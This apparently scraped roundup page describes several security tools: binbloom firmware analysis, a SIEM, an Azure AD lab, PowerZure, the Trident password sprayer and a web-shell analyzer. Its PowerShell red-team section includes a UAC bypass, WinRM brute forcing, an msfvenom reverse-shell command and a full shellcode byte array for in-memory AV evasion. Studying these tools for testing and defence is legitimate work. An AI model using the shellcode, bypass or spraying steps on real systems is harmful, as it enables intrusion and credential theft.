Computing heuristics in big endian order:
Base: 00000000: unique pointers:1839, number of array elements:217900
Base: 01000000: unique pointers:1343, number of array elements:13085
Base: 02000000: unique pointers:621, number of array elements:5735
Base: 03000000: unique pointers:566, number of array elements:3823
Base: 05000000: unique pointers:575, number of array elements:6139
Base: 80000000: unique pointers:642, number of array elements:528
247210
Computing score in little endian order:
Base: 00000000: unique pointers:8309, number of array elements:515404
515404
This firmware seems to be LITTLE ENDIAN

In this output, the last line is the most important one as it gives the result of the analysis. The other lines are information about the number of unique pointers and number of array elements binbloom has been able to find in the firmware, both in big endian and in little endian mode. These lines can provide useful information to corroborate the heuristic used to determine the endianness.
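To make this kind of heuristic concrete, here is a simplified sketch (an illustration, not binbloom's actual algorithm): interpret every aligned 32-bit word under each byte order and count how many look like pointers into the firmware's own address range.

```python
import struct
from typing import Dict

def endianness_scores(data: bytes, base: int = 0) -> Dict[str, int]:
    """Count aligned 32-bit words that, interpreted as pointers,
    fall inside the firmware's own address range, for each byte order.
    The byte order with more plausible pointers wins."""
    scores = {}
    for order, fmt in (("big", ">I"), ("little", "<I")):
        hits = 0
        for off in range(0, len(data) - 3, 4):
            val = struct.unpack(fmt, data[off:off + 4])[0]
            if base <= val < base + len(data):
                hits += 1
        scores[order] = hits
    return scores

# A blob full of little-endian pointers into itself scores far higher
# when read in little-endian mode.
blob = b"".join(struct.pack("<I", 0x10 + i) for i in range(64))
scores = endianness_scores(blob)
guess = "little" if scores["little"] > scores["big"] else "big"
```

binbloom additionally counts unique pointers and array elements, but the underlying idea is the same: the correct byte order produces far more self-consistent pointers.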


Determine the loading address

First, you have to provide a file containing a list of potential function addresses, in hexadecimal (one per line), like this:

00000010
00000054
000005f0
00000a50
00000a54
00000ac0
00000b40
00000b6c
00000b74
00000bc0

This file should be named after the firmware itself, followed by the ".fun" extension.

This file can be generated with the tag_code() function of the provided tag_code.py python script, using IDA Pro:

  • Load the firmware in IDA Pro at address 0 (select the correct architecture/endianness)
  • From the File menu, choose Script File and select tag_code.py
  • In the console at the bottom of IDA Pro, use tag_code(). The functions file is automatically generated.

If you prefer to use another tool to generate the functions file, you can do it as long as you load the firmware at address 0 (i.e. the hex values in the functions file correspond to offsets in the firmware).
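Whatever tool you use, the expected file format is trivial to produce. A minimal sketch (the offsets are the sample values from above; the firmware name is hypothetical):

```python
# Write a binbloom-compatible functions file: one 8-digit hex offset
# per line, named "<firmware>.fun".
offsets = [0x10, 0x54, 0x5F0, 0xA50, 0xA54]

with open("firmware.bin.fun", "w") as f:
    for off in offsets:
        f.write(f"{off:08x}\n")

# Read it back to check the format.
with open("firmware.bin.fun") as f:
    lines = f.read().splitlines()
```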

You can then ask binbloom to compute a (list of) potential loading address(es) by computing a correlation score between the potential functions and the arrays of functions pointers that can be found in the firmware:

binbloom -f firmware.bin -b

This command should give an output like this:

Loaded firmware.bin, size:2668912, bit:ffc00000, 003fffff, nb_segments:1024, shift:22
End address:0028b970
loaded 14903 functions

Highest score for base address: 1545, for base address 80010000
For information, here are the best scores:
For base address 80010000, found 1545 functions
Saving function pointers for this base address...
Done.

In this output, we can see that of the 14903 provided potential functions, 1545 were found in function-pointer arrays when the program assumes that the loading address is 0x80010000.

If there are several sections in the binary firmware, binbloom lists the different sections with the corresponding guess for the loading address:

Highest score for base address: 93, for base address 00000000
For information, here are the best scores:
For base address 00000000, found 93 functions
For base address 00040000, found 93 functions

Here we have a section of code at address 0x00000000, and another one at 0x00040000.
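The correlation idea can be sketched as follows (a toy model with hypothetical values, not binbloom's exact scoring): for each candidate base, count how many of the candidate function offsets appear in the firmware as absolute 32-bit pointers once the base is added.

```python
import struct
from typing import Dict, Iterable

def base_address_scores(data: bytes, func_offsets: Iterable[int],
                        candidate_bases: Iterable[int],
                        endian: str = "<") -> Dict[int, int]:
    """Score each candidate loading address by the number of candidate
    functions (offset + base) that occur somewhere in the firmware
    as an absolute 32-bit pointer."""
    pointers = set()
    for off in range(0, len(data) - 3, 4):
        pointers.add(struct.unpack(endian + "I", data[off:off + 4])[0])
    return {base: sum(1 for f in func_offsets if base + f in pointers)
            for base in candidate_bases}

# Tiny example: a "firmware" consisting of two little-endian pointers
# that only make sense if the image is loaded at 0x80010000.
fw = struct.pack("<II", 0x80010010, 0x80010054)
scores = base_address_scores(fw, [0x10, 0x54], [0x0, 0x80010000])
```

The base address with the highest score is the most plausible loading address.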

Binbloom generates 2 output files:

  • firmware.fad : this file contains the addresses of identified functions
  • firmware.fpt : this file contains the addresses of the pointers to the identified functions

You can now start IDA Pro again (or any reverse engineering software), load the firmware at the specified address and import the addresses of the 1545 identified functions:

  • Load the firmware in IDA Pro at the specified address (in this example 0x80010000)
  • From the File menu, choose Script File and select import_entry_points.py
  • Select the .fad file
  • Select the .fpt file

Note:

binbloom will start by determining the endianness, as this information is needed to look for the arrays of functions pointers. If the automatic analysis of the endianness is wrong, you can override its result with the following option:

-E b: force big endian mode

-E l: force little endian mode


Find the UDS database (for an ECU's firmware)

binbloom can search for an array containing UDS/KWP2000 IDs, with the -u option:

binbloom -f firmware.bin -u

This command should give an output like this:

Loaded firmware.bin, size:1540096, bit:ffe00000, 001fffff, nb_segments:2048, shift:21
End address:00178000
UDS DB position: 1234 with a score of 12 and a stride of 12:
10 00 31 00 26 27 00 80 00 00 00 00
11 00 31 00 24 3d 01 80 00 00 00 00
22 00 10 00 2c 42 01 80 00 00 00 00
27 00 10 00 1c 41 01 80 60 a8 01 80
28 00 31 00 36 7f 01 80 00 00 00 00
2e 00 10 00 18 88 01 80 08 ae 01 80
31 00 30 00 10 41 01 80 00 00 00 00
34 00 10 00 46 4e 01 80 00 00 00 00
36 00 10 00 2a 2d 01 80 00 00 00 00
37 00 10 00 32 3c 00 80 00 00 00 00
3e 00 31 00 54 5b 01 80 00 b2 01 80
85 00 31 00 6a 2f 01 80 00 00 00 00

This output shows that at address 0x1234, a potential UDS database was found with a stride of 12 (meaning that UDS IDs are present in an array in which each element is 12 bytes long). In this example, the UDS IDs are in the first column (10, 11, 22, 27, 28, 2e, 31, 34, 36, 37, 3e and 85).

The list of supported UDS IDs is hard-coded in binbloom.c, you can change it if needed.

This analysis is based on heuristics, so it can give false positives. You have to review the list of potential UDS databases found by binbloom and check which one, if any, is correct.

In this example, we can see that there is a pointer in little endian in each line (26 27 00 80 for the first line, which corresponds to address 0x80002726). There is probably a function at this address to manage UDS command 10. You have to disassemble the code to make sure, and search for cross-references to this UDS database.
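To make the stride idea concrete, here is a simplified sketch of such a scan (an illustration, not binbloom's actual implementation; the ID list is limited to the ones seen above):

```python
# A subset of well-known UDS service IDs, as seen in the example output.
UDS_IDS = [0x10, 0x11, 0x22, 0x27, 0x28, 0x2E, 0x31, 0x34, 0x36, 0x37, 0x3E, 0x85]

def stride_score(data: bytes, pos: int, stride: int) -> int:
    """How many consecutive known UDS service IDs appear starting
    at `pos`, one every `stride` bytes."""
    n = 0
    for i, sid in enumerate(UDS_IDS):
        off = pos + i * stride
        if off >= len(data) or data[off] != sid:
            break
        n += 1
    return n

def find_uds_db(data: bytes, strides=range(4, 17)):
    """Return (score, position, stride) of the best candidate table."""
    best = (0, None, None)
    for stride in strides:
        for pos in range(len(data)):
            s = stride_score(data, pos, stride)
            if s > best[0]:
                best = (s, pos, stride)
    return best

# Synthetic firmware with a 12-byte-stride UDS table at offset 100.
fw = bytearray(400)
for i, sid in enumerate(UDS_IDS):
    fw[100 + i * 12] = sid
score, pos, stride = find_uds_db(bytes(fw))
```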


About

Authors

Guillaume Heilles (@PapaZours)


License

binbloom is provided under the Apache 2.0 license.



Nethive-Project - Restructured And Collaborated SIEM And CVSS Infrastructure



The Nethive Project provides a Security Information and Event Management (SIEM) infrastructure empowered by CVSS automatic measurements.




Features
  • Machine Learning powered SQL Injection Detection
  • Server-side XSS Detection based on Chrome's XSS Auditor
  • Post-exploitation Detection powered by Auditbeat
  • Bash Command History Tracker
  • CVSS Measurement on Detected Attacks
  • Realtime Log Storing powered by Elasticsearch and Logstash
  • Basic System Monitoring
  • Resourceful Dashboard UI
  • Notify Suspicious Activity via Email

Installation

Before installing, please make sure to install the pre-requisites.

You can install Nethive from PyPi package manager using the following command:

[Coming Soon!]

or

You can install Nethive using the latest repository:

$ git clone https://github.com/chrisandoryan/Nethive-Project.git
$ cd Nethive-Project/
$ sudo bash install.sh
$ sudo pip3 install -r requirements.txt

Please make sure all dependencies are installed if any of the above steps fail. For more detailed information, refer to the installation guide.


Quick Start



  1. Fetch and start nethive-cvss docker container

    $ git clone https://github.com/Falanteris/docker-nethive-cvss/
    $ cd docker-nethive-cvss/
    $ docker build -t nethive-cvss .
    $ ./cvss
  2. Start Nethive and copy default configuration

    $ cd Nethive-Project/
    $ cp .env.example .env
  3. Activate all Nethive processing engines: $ sudo python3 main.py
    On the menu prompt, choose [3] Just-Run-This-Thing, then wait for the engines to be initialized.

  4. Start Nethive UI Server

    $ cd Nethive-Project/dashboard/
    $ npm install && npm start
  5. Go to http://localhost:3000/




APICheck - The DevSecOps Toolset For REST APIs



APICheck is a complete toolset designed and created for testing REST APIs.


Why APICheck

APICheck focuses not only on security testing and hacking use cases. The goal of the project is to become a complete toolset for DevSecOps cycles.

The tools are aimed at diverse user profiles:

  • Developers
  • System Administrators
  • Security Engineers & Penetration Testers

Documentation

Here you can find the complete documentation.


Authors

APICheck is being developed by BBVA Innovation Security Labs team.



PowerShell-Red-Team - Collection Of PowerShell Functions A Red Teamer May Use To Collect Data From A Machine



Collection of PowerShell functions a Red Teamer may use to collect data from a machine or gain access to a target. I added ps1 files for the commands included in the RedTeamEnum module, so you can easily find and use a single command if that is all you need. If you want the entire module, perform the following actions after downloading the RedTeamEnum directory and its contents to your device.


C:\PS> robocopy .\RedTeamEnum $env:USERPROFILE\Documents\WindowsPowerShell\Modules\RedTeamEnum *
# This will copy the module to a location that allows you to easily import it. If you are using OneDrive sync you may need to use $env:USERPROFILE\OneDrive\Documents\WindowsPowerShell\Modules\RedTeamEnum instead.

C:\PS> Import-Module -Name RedTeamEnum -Verbose
# This will import all the commands in the module.

C:\PS> Get-Command -Module RedTeamEnum
# This will list all the commands in the module.
  • Convert-Base64.psm1 is a function, as the name states, for encoding and/or decoding text into Base64 format.
C:\PS> Convert-Base64 -Value "Convert me to base64!" -Encode

C:\PS> Convert-Base64 -Value "Q29udmVydCBtZSB0byBiYXNlNjQh" -Decode
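For reference, the same transformation with Python's standard library shows how the two example values above round-trip (byte-for-byte results may differ from the PowerShell function if it uses a different text encoding such as UTF-16):

```python
import base64

# Encode the plain text, and decode the Base64 string from the example.
encoded = base64.b64encode(b"Convert me to base64!").decode()
decoded = base64.b64decode("Q29udmVydCBtZSB0byBiYXNlNjQh").decode()
```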
  • Convert-SID.ps1 is a function that converts SID values to usernames and usernames to SID values
C:\PS> Convert-SID -Username tobor
# The above example converts tobor to its SID value

C:\PS> Convert-SID -SID S-1-5-21-2860287465-2011404039-792856344-500
# The above command converts the SID value to its associated username
  • Test-BruteForceZipPassword is a function that uses a password file to brute force a password-protected zip file using 7zip
C:\PS> Test-BruteForceZipPassword -PassFile 'C:\Users\USER\Downloads\Applications\pass.txt' -Path 'C:\Users\USER\Downloads\Applications\KiTTY.7z' -ZipExe 'C:\Program Files\7-Zip\7z.exe'
# This example uses the passwords in the pass.txt file to crack the password protected KiTTY.7z file
  • Test-BruteForceCredentials is a function that uses WinRM to brute force a users password.
C:\PS> Test-BruteForceCredentials -ComputerName DC01.domain.com -UseSSL -Username 'admin','administrator' -Passwd 'Password123!' -SleepMinutes 5
# This example will test the one password defined against both the admin and administrator users on the remote computer DC01.domain.com using WinRM over HTTPS with a time interval of 5 minutes between each attempt

C:\PS> Test-BruteForceCredentials -ComputerName File.domain.com -UserFile C:\Temp\users.txt -PassFile C:\Temp\rockyou.txt
# This example will test every password in rockyou.txt against every username in the users.txt file without any pause between tried attempts
  • Get-LdapInfo is a function I am very proud of for performing general LDAP queries. Although only two properties will show in the output, all of the properties associated with an object can be seen by piping to Select-Object -Property * or using the -Detailed switch parameter.
C:\PS> Get-LdapInfo -Detailed -SPNNamedObjects
# The above returns all the properties of the returned objects
#
C:\PS> Get-LdapInfo -DomainControllers | Select-Object -Property 'Name','ms-Mcs-AdmPwd'
# If this is run as admin it will return the LAPS password for the local admin account
#
C:\PS> Get-LdapInfo -ListUsers | Where-Object -Property SamAccountName -like "user.samname"
# NOTE: If you include the "-Detailed" switch and pipe the output to where-object it will not return any properties. If you wish to display all the properties of your result it will need to be carried out using the below format
#
C:\PS> Get-LdapInfo -AllServers | Where-Object -Property LogonCount -gt 1 | Select-Object -Property *
  • Get-NetworkShareInfo is a cmdlet used to retrieve information on and/or brute-force discover network shares available on a remote or local machine
C:\PS> Get-NetworkShareInfo -ShareName C$
# The above example returns information on the share C$ on the local machine
#RESULTS
Name : C$
InstallDate :
Description : Default share
Path : C:\
ComputerName : TOBORDESKTOP
Status : OK

C:\PS> Get-NetworkShareInfo -ShareName NETLOGON,SYSVOL,C$ -ComputerName DC01.domain.com, DC02.domain.com, 10.10.10.1
# The above example discovers and returns information on NETLOGON, SYSVOL, and C$ on the 3 remote devices DC01, DC02, and 10.10.10.1
  • Test-PrivEsc is a function that can be used for finding whether WSUS updates over HTTP are vulnerable to PrivEsc, Clear Text credentials are stored in common places, AlwaysInstallElevated is vulnerable to PrivEsc, Unquoted Service Paths exist, and enum of possible weak write permissions for services.
 C:\PS> Test-PrivEsc
  • Get-InitialEnum is a function for enumerating the basics of a Windows Operating System to help better display possible weaknesses.
 C:\PS> Get-InitialEnum
  • Start-SimpleHTTPServer is a function used to host an HTTP server for downloading files. It is meant to be similar to Python's SimpleHTTPServer module. Directories are not traversable through the web server. The files hosted for download will be from the current directory you are in when issuing this command.
C:\PS> Start-SimpleHTTPServer
Open HTTP Server on port 8000

#OR
C:\PS> Start-SimpleHTTPServer -Port 80
# Open HTTP Server on port 80
  • Invoke-PortScan.ps1 is a function for scanning all possible TCP ports on a target. I will improve it in the future by including UDP as well as the ability to define a port range. This one is honestly not even worth using yet because it is very slow. Threading is a weak area of mine and I plan to work on that with this one.
 C:\PS> Invoke-PortScan -IpAddress 192.168.0.1
  • Invoke-PingSweep is a function used for performing a ping sweep of a subnet range.
C:\PS> Invoke-PingSweep -Subnet 192.168.1.0 -Start 192 -End 224 -Source Singular
# NOTE: The source parameter only works if IP Source Routing value is "Yes"

C:\PS> Invoke-PingSweep -Subnet 10.0.0.0 -Start 1 -End 20 -Count 2
# Default value for count is 1

C:\PS> Invoke-PingSweep -Subnet 172.16.0.0 -Start 64 -End 128 -Count 3 -Source Multiple
  • Invoke-UseCreds is a function I created to simplify the process of using obtained credentials during a pen test. I use -Passwd instead of -Password because a parameter named -Password should be configured as a secure string, which is not the case when entering a value into this field; it gets converted to a secure string after you set the value.
# The below command will use the entered credentials to open the msf.exe executable as the user tobor
C:\PS> Invoke-UseCreds -Username 'OsbornePro\tobor' -Passwd 'P@ssw0rd1' -Path .\msf.exe -Verbose
  • Invoke-FodHelperBypass is a function that tests whether or not the UAC bypass will work before executing it to elevate privileges. This of course needs to be run by a member of the local administrators group, as this bypass elevates the privileges of the shell you are in. You can define the program to run, which allows you to execute generated msfvenom payloads as well as cmd or powershell, or just issue commands.
C:\PS> Invoke-FodHelperBypass -Program "powershell" -Verbose
# OR
C:\PS> Invoke-FodHelperBypass -Program "cmd /c msf.exe" -Verbose
  • Invoke-InMemoryPayload is used for AV evasion using an in-memory injection. This requires the runner to generate an msfvenom payload using a command similar to the example below, and to enter the "[Byte[]] $buf" variable into Invoke-InMemoryPayload's "ShellCode" parameter.
# Generate payload to use
msfvenom -p windows/meterpreter/shell_reverse_tcp LHOST=192.168.137.129 LPORT=1337 -f powershell

Start a listener, use that value in the "ShellCode" parameter, and run the command to gain your shell. This also requires certain memory protections to not be enabled. NOTE: there are NOT ANY DOUBLE QUOTES around the ShellCode variable's value, because it is expecting a byte array.

C:\PS> Invoke-InMemoryPayload -Payload 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x5,0x39,0xc0,0xa8,0x89,0x81,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x0,0xff,0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x2,0x0,0x0,0x49,0xb8,0x63,0x6d,0x64,0x0,0x0,0x0,0x0,0x0,0x41,0x50,0x41,0x50,0x48,0x89,0xe2,0x57,0x57,0x57,0x4d,0x31,0xc0,0x6a,0xd,0x59,0x41,0x50,0xe2,0xfc,0x66,0xc7,0x44,0x24,0x54,0x1,0x1,0x48,0x8d,0x44,0x24,0x18,0xc6,0x0,0x68,0x48,0x89,0xe6,0x56,0x50,0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,0xff,0xc8,0x4d,0x89,0xc1,0x4c,0x89,0xc1,0x41,0xba,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0xe,0x41,0xba,0x8,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x59,0x41,0x89,0xda,0xff,0xd5 -Verbose




Adaz - Automatically Deploy Customizable Active Directory Labs In Azure



This project allows you to easily spin up Active Directory labs in Azure with domain-joined workstations, Windows Event Forwarding, Kibana, and Sysmon using Terraform/Ansible.


It exposes a high-level configuration file for your domain to allow you to customize users, groups and workstations.

dns_name: hunter.lab
dc_name: DC-1

initial_domain_admin:
  username: hunter
  password: MyAdDomain!

organizational_units: {}

users:
  - username: christophe
  - username: dany

groups:
  - dn: CN=Hunters,CN=Users
    members: [christophe]

default_local_admin:
  username: localadmin
  password: Localadmin!

workstations:
  - name: XTOF-WKS
    local_admins: [christophe]
  - name: DANY-WKS
    local_admins: [dany]

enable_windows_firewall: yes

Features
  • Windows Event Forwarding pre-configured
  • Audit policies pre-configured
  • Sysmon installed
  • Logs centralized in an Elasticsearch instance which can easily be queried from the Kibana UI
  • Domain easily configurable via YAML configuration file

Here's an incomplete and biased comparison with DetectionLab:

                                          Adaz                  DetectionLab
Public cloud support                      Azure                 AWS, Azure (beta)
Expected time to spin up a lab            15-20 minutes         25 minutes
Log management & querying                 Elasticsearch+Kibana  Splunk Enterprise
WEF                                       ✔️                    ✔️
Audit policies                            ✔️                    ✔️
Sysmon                                    ✔️                    ✔️
YAML domain configuration file            ✔️
Multiple Windows 10 workstations support  ✔️
VirtualBox/VMWare support                                       ✔️
osquery / fleet                           (vote!)               ✔️
Powershell transcript logging             (vote!)               ✔️
IDS logs                                  (vote!)               ✔️

Use-cases
  • Detection engineering: Having access to a clean lab with a standard configuration is a great way to understand what traces common attacks and lateral movement techniques leave behind.

  • Learning Active Directory: I often have the need to test GPOs or various AD features (AppLocker, LAPS...). Having a disposable lab is a must for this.


Screenshots

 



Getting started

Prerequisites
  • An Azure subscription. You can create one for free and you get $200 of credits for the first 30 days. Note that this type of subscription has a limit of 4 vCPUs per region, which still allows you to run 1 domain controller and 2 workstations (with the default lab configuration).

  • A SSH key in ~/.ssh/id_rsa.pub

  • Terraform>= 0.12

  • Azure CLI

  • You must be logged in to your Azure account by running az login. You can use az account list to confirm you have access to your Azure subscription


Installation
  • Clone this repository
git clone https://github.com/christophetd/Adaz.git
  • Create a virtual env and install Ansible dependencies
# Note: the virtual env needs to be in ansible/venv
python3 -m venv ansible/venv
source ansible/venv/bin/activate
pip install -r ansible/requirements.txt
deactivate
  • Initialize Terraform
cd terraform
terraform init

Usage

Optionally edit domain.yml according to your needs (reference here), then run:

terraform apply

Resource creation and provisioning takes 15-20 minutes. Once finished, you will have an output similar to:

dc_public_ip = 13.89.191.140
kibana_url = http://52.176.3.250:5601
what_next =
####################
### WHAT NEXT? ###
####################

Check out your logs in Kibana:
http://52.176.3.250:5601

RDP to your domain controller:
xfreerdp /v:13.89.191.140 /u:hunter.lab\\hunter '/p:Hunt3r123.' +clipboard /cert-ignore

RDP to a workstation:
xfreerdp /v:52.176.5.229 /u:localadmin '/p:Localadmin!' +clipboard /cert-ignore


workstations_public_ips = {
"DANY-WKS" = "52.165.182.15"
"XTOF-WKS" = "52.176.5.229"
}

Don't worry if during the provisioning you see a few messages looking like FAILED - RETRYING: List Kibana index templates (xx retries left)

By default, resources are deployed in the West Europe region under a resource group ad-hunting-lab. You can control the region with a Terraform variable:

terraform apply -var 'region=East US 2'

Documentation

Roadmap

I will heavily rely on the number of thumbs up votes you will leave on feature-proposal issues for the next features!


Suggestions and bugs

Feel free to open an issue or to tweet @christophetd.



PowerZure - PowerShell Framework To Assess Azure Security



For a list of functions, their usage, and more, check out https://powerzure.readthedocs.io

What is PowerZure?

PowerZure is a PowerShell project created to assess and exploit resources within Microsoft's cloud platform, Azure. PowerZure was created out of the need for a framework that can perform both reconnaissance and exploitation of Azure, AzureAD, and the associated resources.


CLI vs. Portal

A common question is why use PowerZure or command line at all when you can just login to the Azure web portal?

This is a fair question and, to be honest, you can accomplish 90% of PowerZure's functionality by clicking around in the portal. However, by using the Azure PowerShell modules, you can perform tasks programmatically that are tedious in the portal, e.g. listing the groups a user belongs to. In addition, you can programmatically upload exploits instead of tinkering around with the messy web UI. Finally, if you compromise a user who has used the PowerShell module for Azure before and are able to steal the accesstoken.json file, you can impersonate that user, which effectively bypasses multi-factor authentication.


Why PowerShell?

While the offensive security industry has seen a decline in PowerShell usage due to the advancements of defensive products and solutions, this project does not contain any malicious code. PowerZure does not exploit bugs within Azure, it exploits misconfigurations.

C# was also explored for creating this project but there were two main problems:

  1. There were at least four different APIs being used for the project: MSOL, Azure REST, Azure SDK, and Graph.

  2. The documentation for these APIs was simply too poor to continue. Entire methods were missing, namespaces were typo'd, and other problems begged the question of what advantage C# gave over PowerShell (answer: none).

Realistically, there is zero reason to ever run PowerZure on a victim’s machine. Authentication is done by using an existing accesstoken.json file or by logging in via prompt when logging into Azure CLI.


Requirements

The "Az" Azure PowerShell module is the primary module used in PowerZure, as it handles most requests interacting with Azure resources. The Az module interacts using the Azure REST API.

The AzureAD PowerShell Module is also used and is for handling AzureAD requests. The AzureAD module uses the Microsoft Graph API.


Author

Author: Ryan Hausknecht (@haus3c)




Trident - Automated Password Spraying Tool



The Trident project is an automated password spraying tool developed to meet the following requirements:

  • the ability to be deployed on several cloud platforms/execution providers

  • the ability to schedule spraying campaigns in accordance with a target’s account lockout policy

  • the ability to increase the IP pool that authentication attempts originate from for operational security purposes

  • the ability to quickly extend functionality to include newly-encountered authentication platforms


Architecture


 

This diagram was generated using Diagrams. The Go gopher was designed by Renee French and is licensed under CC BY 3.0.


Deployment

Deploying trident requires a Google Cloud project, a domain name (for the orchestrator API), and a Cloudflare Access configuration for this domain. Cloudflare Access is used to authenticate requests to the orchestrator API.

brew install cloudflare/cloudflare/cloudflared
brew install terraform
cd terraform
cloudflared login
terraform init
terraform plan
terraform apply

Installation

Trident has a command line interface available in the releases page. Alternatively, you can download and install trident-client via go get:

GO111MODULE=on go get github.com/praetorian-inc/trident/cmd/trident-client

Usage

Config

The trident-client binary sends API requests to the orchestrator. It reads from ~/.trident/config.yaml, which has the following format:

orchestrator-url: https://trident.example.org
providers:
  okta:
    subdomain: example
  adfs:
    domain: adfs.example.org
  o365:
    domain: login.microsoft.com

Campaigns

With a valid config.yaml, the trident-client can be used to create password spraying campaigns, as shown below:

trident-client campaign -u usernames.txt -p passwords.txt --interval 5s --window 120s

The --interval option allows the operator to insert delays between credential attempts. The --window option allows the operator to set a hard stop time for the campaign. Additional arguments are documented below:

Usage:
trident-cli campaign [flags]

Flags:
-a, --auth-provider string this is the authentication platform you are attacking (default "okta")
-h, --help help for campaign
-i, --interval duration requests will happen with this interval between them (default 1s)
-b, --notbefore string requests will not start before this time (default "2020-09-09T22:31:38.643959-05:00")
-p, --passfile string file of passwords (newline separated)
-u, --userfile string file of usernames (newline separated)
-w, --window duration a duration that this campaign will be active (ex: 4w) (default 672h0m0s)
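When tuning these flags against a target's lockout policy, a quick sanity check (a simple model assuming one attempt per interval, not part of trident itself) is:

```python
def max_attempts(window_seconds: int, interval_seconds: int) -> int:
    """Upper bound on credential attempts that fit in the campaign
    window, assuming one attempt per interval."""
    return window_seconds // interval_seconds

# With --interval 5s and --window 120s, at most 24 attempts fit in
# the window; keep this below the target's lockout threshold.
attempts = max_attempts(120, 5)
```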

Results

The results subcommand can be used to query the result table. This subcommand has several options, but defaults to showing all valid credentials across all campaigns.

$ trident-client results
+----+-------------------+------------+-------+
| ID | USERNAME | PASSWORD | VALID |
+----+-------------------+------------+-------+
| 1 | alice@example.org | Password1! | true |
| 2 | bob@example.org | Password2! | true |
| 3 | eve@example.org | Password3! | true |
+----+-------------------+------------+-------+

Additional arguments are documented below:

Usage:
trident-cli results [flags]

Flags:
-f, --filter string filter on db results (specified in JSON) (default '{"valid":true}')
-h, --help help for results
-o, --output-format string output format (table, csv, json) (default "table")
-r, --return string the list of fields you would like to see from the results (comma-separated string) (default "*")


Webshell-Analyzer - Web Shell Scanner And Analyzer



Web shell analyzer is a cross-platform stand-alone binary built solely for the purpose of identifying, decoding, and tagging files that are suspected to be web shells. The web shell analyzer is the bigger brother to the web shell scanner project (http://github.com/tstillz/webshell-scan), which only scans files via regex, with no decoding or attribute analysis.


Disclaimer

The regex and the built-in decoding routines supplied with the scanner are not guaranteed to find every web shell on disk and may identify some false positives. It's also recommended that you test the analyzer and assess its impact before running it on production systems. The analyzer comes with no warranty; use at your own risk.


Features
  • Cross platform, statically compiled binary.
  • JSON output
  • Currently supports most PHP, ASP/X web shells. JSP/X, CFM and other types are in the works.
  • Recursive, multi-threaded scanning capable of iterating through nested directories quickly
  • Ability to handle multiple layers of obfuscated web shells such as base64, gzinflate and char code.
  • Supports PRE/POST actions which power layered de-obfuscation and decoding for the analysis engine
  • Tunable regex logic with modular interfaces to easily extend the analyzer's capabilities
  • Tunable attribute tagging
  • Raw content captures upon match
  • System Info
  • Tested against the web shell repo: https://github.com/tennc/webshell

PRE/POST Actions

Every file that is scanned can be run through PRE and/or POST action:

  • PRE-Decoding: Functions invoked BEFORE matching is performed, such as base64 decoding or string replacement.
  • POST-Decoding: Functions invoked AFTER matching is performed, such as url defanging.

The idea behind PreDecodeActions functions was to use regex to identify a matching string or pattern, acquire its raw matched contents, perform the defined decoding/cleanup steps, and send the final output back to the analysis engine for re-scanning/processing. A very simple example of this is Base64 decoding. In order to run detection logic against a base64-encoded web shell, we must first remove any and all layers of base64. To do this, we could use the following PreDecodeAction:

{
    Name:        "PHP_Base64Decode",
    Regex:       *regexp.MustCompile(`(?i)(?:=|\s+)(base64_decode\('('?\"?[A-Za-z0-9+\/=]+'?\"?))`),
    DataCapture: *regexp.MustCompile(`(?i)((?:'|")[A-Za-z0-9+\/=]+(?:'|"))`),
    PreDecodeActions: []cm.Action{
        {Function: cm.StringReplace, Arguments: []interface{}{"\"", "", -1}},
        {Function: cm.StringReplace, Arguments: []interface{}{"'", "", -1}},
    },
    Functions: []cm.Base_Func{cm.DecodeBase64},
},

